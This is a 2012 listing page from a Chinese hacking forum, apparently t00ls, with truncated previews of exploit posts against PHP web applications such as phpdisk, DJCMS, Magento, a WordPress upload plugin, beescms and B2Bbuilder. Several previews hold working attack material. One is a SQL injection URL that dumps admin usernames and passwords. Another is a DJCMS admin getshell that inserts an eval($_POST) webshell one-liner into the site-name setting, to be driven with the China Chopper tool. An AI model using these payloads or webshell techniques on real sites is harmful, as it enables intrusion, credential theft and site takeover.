phpdisk 老漏洞新用法 以及后台拿SHELL办法

以前暴出过通杀0DAY代码如下 /api/datacall.php?type=user&limit=1&order=1 and(select 1 from(select count(*),concat((select (select (select concat(0×27,0x7e,pd_users.username,0×27,0x7e,pd_users.password,0×27,0x7e) from pd_users where userid=1 limit 0,1)) from information_schema.ta

2012-9-15 11:47 22 4539

akcms文件任意命名漏洞

最近在练习PHP代码审计,随便下了一个akcms源码模版分析了下,貌似这个建站源码用的人也不少。刚进t00ls,请各位多多指教。废话不说了,直接进正文。0x01 漏洞代码分析 这个漏洞是由于作者的逻辑错误的导致的,漏洞存在于include\common.func.php文件中的checkfilename函数,代码如下图 可

2012-9-14 16:35 26 4416

DJCMS 3.0后台拿shell

进入后台 在其它设置里 网站名称插入以下一句话 记住提交两次");eval($_POST)?>然后用菜刀连接http://www.u.com/inc/config.php by:xch40

2012-9-13 14:51 11 3068

Magento eCommerce Platform XXE Injection利用

这是之前的文章,今天注册t00ls论坛顺便转过来,希望各位牛们批评指正,不知道发在哪个板块就发这里了。0x1在wooyun-zone xsser的文章zend framework文件读取漏洞分析中有提及到magento,下面是其中的原文:据@蟋蟀哥哥 在乌云上的漏洞报告提醒,一些开源软件因为使用了zend framework的xml模块功能导

2012-7-25 21:19 15 3898

WordPress的前端上传v0.5.4.4任意PHP文件上传

插件不正确过滤的文件类型,允许上传以下格式的文件类型: t00ls.php.jpg 易受攻击的主机,将作为一个php文件,这些文件,允许上传并执行恶意文件。 在创建这个插件上传文件夹,代码利用uniqid添加一个唯一的字符串上传文件夹的名称,以便更好地隐藏它直接访问。 例如: / wp-content/uploads

2012-7-25 20:16 18 4423

beescms X-Forwarded-For 注射

beescms X-Forwarded-For 注射member/member.php文件//........................$ip=fl_html(fl_value(get_ip()));$sql="update ".DB_PRE."member set member_time='{$addtime}',member_ip='{$ip}' where id={$last_id}";$GLOBALS->query($sql);//........................ 跟踪。{$_SESSION}来源。els

2012-7-10 13:01 11 3280

ishowmusic getshell

在某非主流站上看到的这套程序.就下来学习一下.这个程序好多getshell . //漏洞代码 musicbox.phpif (GetCookie('userlogin')!="1"){ //验证方式...Showmsg("no","您还没有登录或注册!","登录或注册", "login.php?jumpurl=musicbox.php");exit; } else { $username=GetCookie('username'); }//

2012-7-8 10:07 6 3312

315爱购程序任意文件源码查看

pic.phpfunction url_base64_decode($code){if($code=="")return ""; $code=str_replace("!",'+',$code); $code=str_replace(",",'/',$code); $str=base64_decode($code); return $str;}$url=url_base64_decode($_GET);//....省略header("Content-type: image/jpeg");echo file_get_conten

2012-7-8 03:09 14 3363

B2Bbuilder php SQL inj

wap/index.phpif (!empty($_GET))$action=$_GET;else$action="home";//$action=empty($action)?"home":$_GET;//===============================if(in_array($action, array('home','offer_cat','offer_list','offer_detail','product_cat','product_list','product_detail','news_cat','news_list','n

2012-7-7 22:37 8 3027

TEXTCUBE鸡肋读取文件漏洞 顺便求突破

韩国的一个博客程序TEXTCUBE 读了下发现个奇怪的问题 技术有限 希望大家点拨下!\framework\Dispatcher.php (57行)$part = strtok($uri, '/'); // $uri == resources/locale/messages.php.if (in_array($part, array('resources','plugins','cache','skin','attach','thumbnail'))) { //限制了读取

2012-7-4 17:52 19 14067